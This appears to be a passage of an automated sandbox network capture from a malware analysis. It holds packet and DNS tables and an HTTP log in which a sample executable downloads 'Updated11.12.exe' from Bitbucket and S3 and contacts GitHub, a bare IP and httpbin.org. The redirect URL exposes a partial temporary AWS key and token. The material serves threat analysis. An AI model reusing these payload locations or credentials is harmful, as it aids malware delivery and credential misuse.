                                                Aug 27, 2024 13:05:53.123374939 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205302000 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205317020 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205415964 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205421925 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205780983 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205801010 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205851078 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205854893 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205878973 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205904961 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.207468033 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.207482100 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.207539082 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.207542896 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.207669973 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.210988998 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211004019 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211057901 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.211064100 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211424112 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.211925983 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211939096 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211991072 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.211996078 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.212367058 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.214973927 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.214996099 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215046883 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215050936 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215364933 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215379953 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215413094 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215436935 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215441942 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215466976 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215492964 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215667009 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215981007 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.663254023 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:53.663301945 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:53.663372993 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:53.664318085 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:53.664331913 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.146549940 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.146866083 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.146888971 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.146977901 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.146982908 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.147918940 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.147988081 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.239636898 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.239725113 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.239758968 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.284506083 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.287533045 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.287547112 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.335323095 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.386416912 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.386482954 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.386646032 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.386770010 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.386787891 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.386812925 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.386818886 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.389255047 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.389275074 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.389348984 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.389790058 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.389801025 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.869247913 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.869534016 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.869563103 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.869638920 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.869643927 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.870567083 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.870645046 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.883871078 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.883934975 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.884119034 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.928499937 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.931736946 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.931742907 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.983084917 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:55.041496992 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:55.041614056 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:55.041660070 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:55.041726112 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:55.041740894 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:55.041752100 CEST49738443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:55.041757107 CEST44349738185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:19.825524092 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:19.825618029 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:19.825704098 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:19.826270103 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:19.826308012 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.458353043 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.458566904 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.458614111 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.458720922 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.458733082 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.459757090 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.459820032 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.477685928 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.477766991 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.477863073 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.520503044 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.525733948 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.525754929 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.573447943 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.850255966 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.850352049 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.850424051 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.850533009 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.850533962 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.850649118 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.850694895 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.850729942 CEST49747443192.168.2.4140.82.121.3
                                                Aug 27, 2024 13:07:20.850745916 CEST44349747140.82.121.3192.168.2.4
                                                Aug 27, 2024 13:07:20.852243900 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:20.852279902 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:20.852361917 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:20.852566004 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:20.852580070 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.326848030 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.327220917 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.327244043 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.327265024 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.327269077 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.328284979 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.328347921 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.329375029 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.329437017 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.329447031 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.372509956 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.376863003 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.376871109 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.424711943 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.527702093 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.527772903 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.527813911 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.527846098 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.528000116 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.528000116 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.528017044 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.535803080 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.535907030 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.535914898 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.535979986 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.536011934 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.536042929 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.536096096 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.536104918 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.536190033 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.536566019 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.536634922 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.542675018 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.590610027 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.618257046 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.618412971 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.618607044 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.618627071 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.618921041 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.618973017 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.618999004 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.619005919 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.619055986 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.619113922 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.619122982 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.619178057 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.619885921 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.619939089 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.619971037 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.619998932 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.620033026 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.620043993 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.620126963 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.626449108 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.626538992 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.626571894 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.626621962 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.626689911 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:21.626691103 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.626796961 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.627157927 CEST49748443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:07:21.627172947 CEST44349748185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:07:25.028517008 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:25.028558969 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:25.028630018 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:25.032730103 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:25.032743931 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:25.696743965 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:25.696858883 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:25.707931042 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:25.707950115 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:25.708223104 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:25.753531933 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:26.838311911 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:26.838365078 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:26.838382959 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:27.166414022 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:27.166430950 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:27.166493893 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:27.166517019 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:27.166590929 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:27.167021036 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:27.167073965 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:27.167121887 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:27.169718981 CEST49749443192.168.2.445.125.66.18
                                                Aug 27, 2024 13:07:27.169734955 CEST4434974945.125.66.18192.168.2.4
                                                Aug 27, 2024 13:07:29.679976940 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:29.680015087 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:29.680083990 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:29.680411100 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:29.680425882 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.379168987 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.379359961 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.379371881 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.379513025 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.379517078 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.380469084 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.380635977 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.381537914 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.381594896 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.381673098 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.381678104 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.429136038 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.500083923 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.500174999 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.500225067 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.500319004 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.500329018 CEST443497503.211.178.193192.168.2.4
                                                Aug 27, 2024 13:07:30.500346899 CEST49750443192.168.2.43.211.178.193
                                                Aug 27, 2024 13:07:30.500351906 CEST443497503.211.178.193192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 27, 2024 13:05:45.378835917 CEST6404353192.168.2.41.1.1.1
                                                Aug 27, 2024 13:05:45.385963917 CEST53640431.1.1.1192.168.2.4
                                                Aug 27, 2024 13:05:46.678253889 CEST6069853192.168.2.41.1.1.1
                                                Aug 27, 2024 13:05:46.698316097 CEST53606981.1.1.1192.168.2.4
                                                Aug 27, 2024 13:05:53.648963928 CEST5498653192.168.2.41.1.1.1
                                                Aug 27, 2024 13:05:53.660893917 CEST53549861.1.1.1192.168.2.4
                                                Aug 27, 2024 13:07:19.793945074 CEST5404953192.168.2.41.1.1.1
                                                Aug 27, 2024 13:07:19.800834894 CEST53540491.1.1.1192.168.2.4
                                                Aug 27, 2024 13:07:29.656049013 CEST5373653192.168.2.41.1.1.1
                                                Aug 27, 2024 13:07:29.664385080 CEST53537361.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 27, 2024 13:05:45.378835917 CEST192.168.2.41.1.1.10x33eeStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.678253889 CEST192.168.2.41.1.1.10x20d4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:53.648963928 CEST192.168.2.41.1.1.10xd3e3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:07:19.793945074 CEST192.168.2.41.1.1.10xf183Standard query (0)github.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:07:29.656049013 CEST192.168.2.41.1.1.10x1643Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 27, 2024 13:05:45.385963917 CEST1.1.1.1192.168.2.40x33eeNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:45.385963917 CEST1.1.1.1192.168.2.40x33eeNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:45.385963917 CEST1.1.1.1192.168.2.40x33eeNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.216.51.233A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.217.234.33A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.217.123.137A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.217.66.108A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.216.208.33A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.217.122.81A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.217.88.116A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:46.698316097 CEST1.1.1.1192.168.2.40x20d4No error (0)s3-w.us-east-1.amazonaws.com52.216.86.131A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:53.660893917 CEST1.1.1.1192.168.2.40xd3e3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:53.660893917 CEST1.1.1.1192.168.2.40xd3e3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:53.660893917 CEST1.1.1.1192.168.2.40xd3e3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:05:53.660893917 CEST1.1.1.1192.168.2.40xd3e3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:07:19.800834894 CEST1.1.1.1192.168.2.40xf183No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:07:29.664385080 CEST1.1.1.1192.168.2.40x1643No error (0)httpbin.org3.211.178.193A (IP address)IN (0x0001)false
                                                Aug 27, 2024 13:07:29.664385080 CEST1.1.1.1192.168.2.40x1643No error (0)httpbin.org34.194.69.213A (IP address)IN (0x0001)false
                                                • bitbucket.org
                                                • bbuseruploads.s3.amazonaws.com
                                                • raw.githubusercontent.com
                                                • github.com
                                                • https:
                                                • 45.125.66.18
                                                • httpbin.org
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449730185.166.143.494437612C:\Users\user\Desktop\UBONg7lmVR.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:05:46 UTC109OUTGET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1
                                                Host: bitbucket.org
                                                Connection: Keep-Alive
                                                2024-08-27 11:05:46 UTC4997INHTTP/1.1 302 Found
                                                Date: Tue, 27 Aug 2024 11:05:46 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Server: AtlassianEdge
                                                Location: https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8 [TRUNCATED]
                                                Expires: Tue, 27 Aug 2024 11:05:46 GMT
                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                X-Used-Mesh: False
                                                Vary: Accept-Language, Origin
                                                Content-Language: en
                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                X-Dc-Location: Micros-3
                                                X-Served-By: af20b92cf0ae
                                                X-Version: e13784b917ea
                                                X-Static-Version: e13784b917ea
                                                X-Request-Count: 354
                                                X-Render-Time: 0.06661272048950195
                                                X-B3-Traceid: b4582ced187d484eb0f1469616170840
                                                X-B3-Spanid: d6d8106431675a2f
                                                X-Frame-Options: SAMEORIGIN
                                                Content-Security-Policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly. [TRUNCATED]
